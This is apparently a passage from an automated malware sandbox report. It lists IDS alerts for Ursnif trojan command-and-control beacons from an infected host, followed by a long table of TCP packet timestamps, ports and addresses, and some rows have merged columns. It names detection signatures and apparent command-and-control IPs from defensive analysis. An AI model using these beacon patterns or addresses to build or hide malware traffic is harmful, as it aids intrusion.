                                                 09/10/21-11:13:13.069914 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49887 | 80 | 192.168.2.7 | 13.225.29.191
                                                 09/10/21-11:13:28.241213 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49824 | 80 | 192.168.2.7 | 13.225.29.191
                                                 09/10/21-11:13:39.121591 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49935 | 80 | 192.168.2.7 | 13.225.29.204
                                                 09/10/21-11:13:39.121591 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49935 | 80 | 192.168.2.7 | 13.225.29.204
                                                 09/10/21-11:13:53.557957 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49938 | 80 | 192.168.2.7 | 13.225.29.191

                                                Network Port Distribution

                                                TCP Packets

                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                 Sep 10, 2021 11:28:19.840903997 CEST | 49767 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.840958118 CEST | 443 | 49767 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.841062069 CEST | 49767 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.841764927 CEST | 49768 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.841793060 CEST | 443 | 49768 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.841846943 CEST | 49768 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.842763901 CEST | 49767 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.842793941 CEST | 443 | 49767 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.842941046 CEST | 49768 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.842956066 CEST | 443 | 49768 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.885902882 CEST | 443 | 49768 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.885997057 CEST | 49768 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.886013031 CEST | 443 | 49767 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.886089087 CEST | 49767 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.891499996 CEST | 49768 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.891515970 CEST | 443 | 49768 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.891838074 CEST | 49767 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.891863108 CEST | 443 | 49767 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.891932011 CEST | 49768 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.891941071 CEST | 443 | 49768 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.891969919 CEST | 443 | 49768 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.892020941 CEST | 49768 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.892199993 CEST | 443 | 49767 | 104.20.185.68 | 192.168.2.5
                                                 Sep 10, 2021 11:28:19.892251968 CEST | 49767 | 443 | 192.168.2.5 | 104.20.185.68
                                                 Sep 10, 2021 11:28:19.943165064 CEST | 443 | 49768 | 104.20.185.68 | 192.168.2.5
                                                Sep 10, 2021 11:28:19.943229914 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.943244934 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.943290949 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.944987059 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.947670937 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.947748899 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:20.161031961 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.161068916 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.161149025 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.161221027 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.161271095 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.161757946 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.162544012 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.162564993 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.189171076 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.189189911 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.207179070 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.207247019 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.212363005 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.212379932 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.212626934 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.212626934 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.212681055 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.227986097 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.228068113 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245215893 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245265961 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245290995 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245300055 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245304108 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245312929 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245362997 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245369911 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245374918 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245384932 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245424032 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245434999 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245464087 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245476007 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245481968 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245506048 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245534897 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245748997 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245799065 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257302046 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257323980 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.257508993 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257618904 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.257678986 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257776022 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.257855892 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:24.599733114 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.599767923 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.599860907 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.601958990 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.601990938 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602061033 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602133989 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602180004 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602222919 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602246046 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602251053 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602318048 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602407932 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602428913 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602484941 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602840900 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602864981 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.603053093 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.605899096 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.605923891 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632415056 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632425070 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632442951 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632457972 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632488012 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632510900 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632536888 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632563114 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.656590939 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.656625032 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.658821106 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.658917904 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.665678024 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.665690899 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.665970087 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.666028023 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.666134119 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.677709103 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.677810907 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.678397894 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.678419113 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.678518057 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.679182053 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.683211088 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.683238983 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.683475971 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.683540106 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.683655977 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.689750910 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.689881086 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.695409060 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.695432901 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.695658922 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.695667028 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.695693016 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.695750952 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696830034 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.696898937 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.696924925 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696942091 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.696949005 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696990967 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.696994066 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697009087 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697035074 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697062969 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697071075 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697112083 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697119951 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697160006 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697165966 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697179079 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697201014 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697231054 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697295904 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697338104 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697348118 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697386026 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.697393894 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.697432995 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698538065 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698606014 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698616028 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698659897 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698668003 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698713064 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698796034 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698843002 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698852062 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698899984 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.698905945 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.698951006 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.699999094 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700064898 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700074911 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700119019 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700504065 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700567961 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700644970 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700695038 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.700750113 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.700839996 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701127052 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701186895 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701222897 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701277018 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701308012 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701358080 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701395988 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701442957 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.701456070 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.701502085 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.702769041 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.702883005 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.703100920 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.703152895 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.703670979 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.703732967 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720750093 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720794916 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720819950 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720828056 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720841885 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720851898 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720855951 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720895052 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720896959 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720921993 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720927000 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720936060 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.720957994 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.720994949 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721007109 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721060991 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721292019 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721330881 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721380949 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721414089 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.721431971 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.721476078 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.722407103 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.722805023 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.722898960 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.722917080 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.722974062 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.724235058 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.724261045 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.724925995 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.725006104 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.725322008 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.725737095 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.725773096 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.726006031 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.726022959 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.726190090 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.726247072 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733357906 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733428001 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733465910 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733479977 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733504057 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733515024 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733537912 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733540058 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733561993 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733570099 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733594894 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733597994 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733627081 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733635902 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733649969 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733689070 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.733700037 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.733747005 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.735622883 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.735735893 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.735801935 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.737041950 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.737118959 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.737179041 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.739213943 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.739305019 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.739391088 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746005058 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746109009 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746126890 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746146917 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.746171951 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.746212959 CEST44349817151.101.1.44192.168.2.5
Sep 10, 2021 11:28:24.746222019 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746237040 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746294022 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746304989 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746314049 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746340036 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746376038 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746398926 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746413946 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746485949 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746496916 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746551991 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746551991 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746572971 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746601105 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746643066 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.746654987 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.746711016 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.747304916 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.747395992 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.747409105 CEST  443  49817  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.747463942 CEST  49817  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.748523951 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.748620987 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.748642921 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.748725891 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.748965979 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749113083 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749146938 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749169111 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749181986 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749218941 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749274969 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749326944 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749356031 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749403000 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749425888 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749432087 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749480009 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749516964 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749524117 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749548912 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749567032 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749610901 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749613047 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749631882 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749659061 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749695063 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749697924 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749721050 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749742031 CEST  49818  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749763012 CEST  443  49818  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749784946 CEST  49821  443  192.168.2.5  151.101.1.44
Sep 10, 2021 11:28:24.749804020 CEST  443  49821  151.101.1.44  192.168.2.5
Sep 10, 2021 11:28:24.749809980 CEST  49818  443  192.168.2.5  151.101.1.44
